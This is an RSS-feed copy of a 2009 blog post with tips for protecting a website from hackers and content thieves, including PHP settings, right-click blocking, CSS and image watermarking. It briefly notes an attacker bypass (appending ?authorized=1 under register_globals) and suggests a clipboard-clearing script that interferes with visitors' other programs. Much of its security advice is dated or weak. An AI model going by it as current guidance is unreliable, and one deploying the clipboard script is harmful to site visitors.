<p>Avoid obvious folder names like secret, personal, private, and protected. Avoid obvious file names like customerorders.txt and creditcardnumbers.txt. Automated hacking tools look for common names. If you have confidential information on the web server, make sure it is encrypted. If you have some images, consider using the ALT tags to add common mispellings to your web pages. It can help your SEO, and help idetify your stolen web content. If the thief performs any search and replace, it is more probable that the thief will miss that misspelled text.<br />
Index.htm:</p>
<p>Put a file called &#8220;index.htm&#8221; or &#8220;index.html&#8221; in every directory on your web site. This prevents thieves from viewing other files located in the same directory. Htaccess can also be used to prevent the directory listing. Do not use obvious names for your confidential password, email, and order directories and filenames.<br />
Using PHP:</p>
<p>When you install a new CMS (Content Management System) or bulletin board system like phpBB, change every default setting you can. With PHP, set display_errors to 0. Error messages give too many clues to hackers. If you use PHP, the Register Globals directive should be turned off. Why? If Register Globals is enabled, then adding ?authorized=1 to the query will let an attacker break in.<br />
Passwords:</p>
<p>A web-site can be password protected by both Javascript and .htaccess If you are protecting one area of your site, validate the user&#8217;s login credentials every time. Cookies and input forms are too easy to forge. Htaccess information is available at www.javascript.com/howto/htacess.shtml .htaccess is more secure than Javascript<br />
Data Input:</p>
<p>Make sure all data input that isn&#8217;t validated is deleted immediately. Even information in a cookie can be manipulated by a hacker. Form data should be submitted as part of a POST, not GET, and use no cache tags. The user&#8217;s information will not be displayed when the back button is pressed on the browser.<br />
Scripts:</p>
<p>Check scripts you use on your web site for security holes. Enter your script name and the word &#8217;security&#8217; into search engines to try to find fixes or alternative safe scripts. Rename common scripts before installing them. Check regularly for updates and patches. Many scripts have a lot of extra features you do not need. Either remove or turn off those extra features. Use the administration section to change file permissions as necessary.<br />
Disable Right-Click:</p>
<p>Javascript can be used to disable the mouse right-click. Selections on the pop-up menu can be used to view your source code and save your images. Disabling the right-click &#8211; although not effective, reminds the thief that you own the site&#8217;s copyright. However, disabling the right-click also disables other menu choices like add to favorites. Smart users can still use the View Source to see what you&#8217;ve done, or enter javascript:void(document.contextmenu=null) in the address bar to break your protection. Thieves can browse their cache to get your images and use an offline browse to download your web pages. Thieves can use a screen capture program to save your images.</p>
<p>The following script disables the mouse right-click.<br />
&lt;script type=&#8221;text/javascript&#8221;&gt;&lt;!&#8211;<br />
document.oncontextmenu=function() { return false; }<br />
// &#8211;&gt;&lt;/script&gt;<br />
HTML Compression:</p>
<p>An HTML compression program removes line returns from your HTML code. A free version of HTML Shrinker is available at www.thepluginsite.com/products/htmlshrinker/<br />
HTML Encryption:</p>
<p>The HTML page is scrambled with a script added at the beginning to unscramble the code so the browser can display the content. View source will only show the scrambled version. However, search engines will not able to read your scrambled version either. CGIScript at www.scriptsearch.com disables right-clicking and encrypts your code so that it can&#8217;t be saved from a browser or viewed.</p>
<p>Use www.dynamicdrive.com/dynamicindex9/encrypter.htm to paste a section of your HTML code, encrypt it, and copy it back to your HTML editor.</p>
<p>CSS Options:</p>
<p>To prevent printing insert these commands in the main stylesheet:<br />
media print{<br />
body {display:none;}<br />
}</p>
<p>To prevent text from being selected, the text can be placed inside</p>
<p>tags<br />
&lt;div style=&#8221;-moz-user-select: none;&#8221;&gt;Text that can not be selected.&lt;/div&gt;<br />
Place a CSS layer over the top of an image. When the visitor right-clicks on the image, they&#8217;ll actually be clicking on the layer instead of the image.</p>
<p>To disable the clipboard, add the following code inside the tags:<br />
onload=setinterval(&#8221;window.clipboarddata.cleardata ()&#8221;, 20)</p>
<p>The disabled clipboard remains active until that browser window is closed, affecting other programs.<br />
Using Frames:</p>
<p>Place your site in an invisible frame. Create a frameset for your main page with no-right click and menubar free with this code:</p>
<p>Image Protection:</p>
<p>Convert your images to flash movies. However, a flash decompiler can decrypt your flash applets. Flash applets can check their serving location. Check the serving location at random times. Google indexes SWF files.</p>
<p>Secure Image from Artistscope is a Java based application that encrypts your images so they can only be served from a specified URL. Since the images are part of the application, traditional methods of stealing your images will not work. www.artistscope.net/secure_image/</p>
<p>Photographers, Artists, and Illustrators &#8211; don&#8217;t include links to the high resolution versions of your work. If you do, make sure your watermark is clearly displayed.</p>
<p>Split your images into pieces, with the browser reassembling to display the original image.</p>
<p>Paint Shop Pro and Photoshop can use a Digimarc plugin. Personal information about the author can be added to the image file. This information can be read by any DIgimarc enabled imaging program to prove you are the creator. A basic subscription costs $79.00 for one year with the ability to watermark up to 1000 images.<br />
Watermarks:</p>
<p>Add watermarks or text captions to your images. A watermark can be added directly to a copy of the image or the watermark can be saved with a transparent background for a layer.<br />
&lt;div style=&#8221;position: absolute; left: 10px; top: 15px; width: 210px; height: 210px; background-image: url(mypicture.jpg);&#8221;&gt;&lt;img src=&#8221;watermark.gif&#8221; alt=&#8221;" width=&#8221;210&#8243; height=&#8221;210&#8243; /&gt;&lt;/div&gt;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.simsekmert.com/wp/2009/04/protect-your-web-site-web-sitenizi-koruyun/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

